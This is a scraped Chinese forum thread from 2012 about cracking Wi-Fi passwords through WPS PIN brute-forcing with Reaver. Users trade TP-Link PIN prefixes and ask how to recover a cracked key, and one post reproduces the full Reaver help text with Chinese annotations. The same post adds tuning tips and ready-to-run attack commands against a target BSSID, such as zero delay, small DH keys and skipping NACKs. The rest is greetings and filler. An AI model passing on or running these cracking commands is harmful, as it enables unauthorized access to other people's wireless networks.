ubnt解决方案
楼主: pesticide63

新春贺礼!公布1小时内reaver快速PIN破密技术研究思路! 共同努力

  [复制链接]

1731

回帖

2881

积分

88 小时

在线时间

少校

注册时间
2012-1-27
金币
1099 个
威望
8 个
荣誉
0 个
累计签到:178 天
连续签到:0 天
[LV.200]无线新星
发表于 2012-2-7 19:50 |显示全部楼层
TPLINK TD-89841N
里面可以产生新的PIN码,也可恢复为初始PIN码,这台初始的前四位为9750,我不断的让他产 ...
hambj 发表于 2012-2-6 23:59



    证明没用啊!!!!!!!!!!我都伤心失望极了!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
回复

使用道具 举报

251

回帖

711

积分

295 小时

在线时间

中尉

注册时间
2011-2-28
金币
344 个
威望
7 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2012-2-7 19:50 |显示全部楼层
回复 1# pesticide63


    楼主,用xiaopan 0.3.6里的minidwep 快PIN完了的时候窗口自动关闭了,怎么找出PJ的密码啊?
回复

使用道具 举报

1731

回帖

2881

积分

88 小时

在线时间

少校

注册时间
2012-1-27
金币
1099 个
威望
8 个
荣誉
0 个
累计签到:178 天
连续签到:0 天
[LV.200]无线新星
发表于 2012-2-7 19:53 |显示全部楼层
pin码是随机的啊!!!!!!!!!我都伤心失望极了!!!!!!!!!!!!!!!!!!
回复

使用道具 举报

232

回帖

319

积分

83 小时

在线时间

少尉

注册时间
2010-8-11
金币
58 个
威望
1 个
荣誉
0 个
累计签到:8 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2012-2-7 21:25 |显示全部楼层
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>


Required Arguments:
  -i, --interface=<wlan>  Name of the monitor-mode interface to use
                          网卡的监视接口,通常是mon0
  -b, --bssid=<mac>       BSSID of the target AP
                          AP的MAC地址


Optional Arguments:
  -m, --mac=<mac>         MAC of the host system
                          指定本机MAC地址,在AP有MAC过滤的时候需要使用
  -e, --essid=<ssid>      ESSID of the target AP
                          路由器的ESSID,一般不用指定
  -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
                          信号的频道,如果不指定会自动扫描
  -o, --out-file=<file>   Send output to a log file [stdout]
                          标准输出到文件
  -s, --session=<file>    Restore a previous session file
                          恢复进程文件
  -C, --exec=<command>    Execute the supplied command upon successful pin recovery
                          pin成功后执行命令
  -D, --daemonize         Daemonize reaver
                          设置reaver成Daemon
  -a, --auto              Auto detect the best advanced options for the target AP
                          对目标AP自动检测高级参数
  -f, --fixed             Disable channel hopping
                          禁止频道跳转
  -5, --5ghz              Use 5GHz 802.11 channels
                          使用5G频道
  -v, --verbose           Display non-critical warnings (-vv for more)
                          显示不重要警告信息 -vv 可以显示更多
  -q, --quiet             Only display critical messages
                          只显示关键信息
  -h, --help              Show help
                          显示帮助


Advanced Options:
  -p, --pin=<wps pin>          Use the specified 4 or 8 digit WPS pin
                               直接读取psk(本人测试未成功,建议用网卡自带软件获取)
  -d, --delay=<seconds>        Set the delay between pin attempts [1]
                               pin间延时,默认1秒,推荐设0
  -l, --lock-delay=<seconds>   Set the time to wait if the AP locks WPS pin attempts [60]
                               AP锁定WPS后等待时间
  -g, --max-attempts=<num>     Quit after num pin attempts
                               最大pin次数
  -x, --fail-wait=<seconds>    Set the time to sleep after 10 unexpected failures [0]
                               10次意外失败后等待时间,默认0秒
  -r, --recurring-delay=<x:y>  Sleep for y seconds every x pin attempts
                               每x次pin后等待y秒
  -t, --timeout=<seconds>      Set the receive timeout period [5]
                               收包超时,默认5秒
  -T, --m57-timeout=<seconds>  Set the M5/M7 timeout period [0.20]
                               M5/M7超时,默认0.2秒
  -A, --no-associate           Do not associate with the AP (association must be done by another application)
                               不连入AP(连入过程必须有其他程序完成)
  -N, --no-nacks               Do not send NACK messages when out of order packets are received
                               不发送NACK信息(如果一直pin不动,可以尝试这个参数)
  -S, --dh-small               Use small DH keys to improve crack speed
                               使用小DH关键值提高速度(推荐使用)
  -L, --ignore-locks           Ignore locked state reported by the target AP
                               忽略目标AP报告的锁定状态
  -E, --eap-terminate          Terminate each WPS session with an EAP FAIL packet
                               每当收到EAP失败包就终止WPS进程
  -n, --nack                   Target AP always sends a NACK [Auto]
                               对目标AP总是发送NACK,默认自动
  -w, --win7                   Mimic a Windows 7 registrar [False]
                               模拟win7注册,默认关闭

------个人心得---------------------------------------------------------

对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S

如果一直pin不动,尝试加-N参数
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N
回复

使用道具 举报

630

回帖

2180

积分

681 小时

在线时间

少校

注册时间
2011-2-14
金币
1283 个
威望
15 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2012-2-7 21:28 |显示全部楼层
吧vhjiujjhjh
回复

使用道具 举报

70

回帖

158

积分

42 小时

在线时间

上等兵

注册时间
2011-8-14
金币
77 个
威望
0 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2012-2-7 21:37 |显示全部楼层
0909.......................
回复

使用道具 举报

45

回帖

144

积分

23 小时

在线时间

上等兵

注册时间
2012-1-16
金币
94 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2012-2-7 21:44 |显示全部楼层
tp 前4位:4669
回复

使用道具 举报

15

回帖

33

积分

6 小时

在线时间

新兵上阵

注册时间
2012-1-11
金币
15 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2012-2-7 22:14 |显示全部楼层
很好..加速起来~
回复

使用道具 举报

77

回帖

127

积分

46 小时

在线时间

上等兵

注册时间
2011-9-6
金币
33 个
威望
2 个
荣誉
0 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2012-2-7 23:46 |显示全部楼层
PIN 码估计是随机的!!!
回复

使用道具 举报

188

回帖

457

积分

48 小时

在线时间

少尉

注册时间
2010-2-7
金币
250 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2012-2-7 23:57 |显示全部楼层
祝新春愉快,步步高升
回复

使用道具 举报

136

回帖

643

积分

137 小时

在线时间

中尉

注册时间
2011-11-27
金币
483 个
威望
2 个
荣誉
0 个
累计签到:27 天
连续签到:0 天
[LV.50]初入江湖
发表于 2012-2-8 00:04 |显示全部楼层
回复

使用道具 举报

76

回帖

126

积分

66 小时

在线时间

上等兵

注册时间
2009-11-8
金币
41 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2012-2-8 00:26 |显示全部楼层
呵呵,新年快乐
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-9-22 07:29

返回顶部 返回列表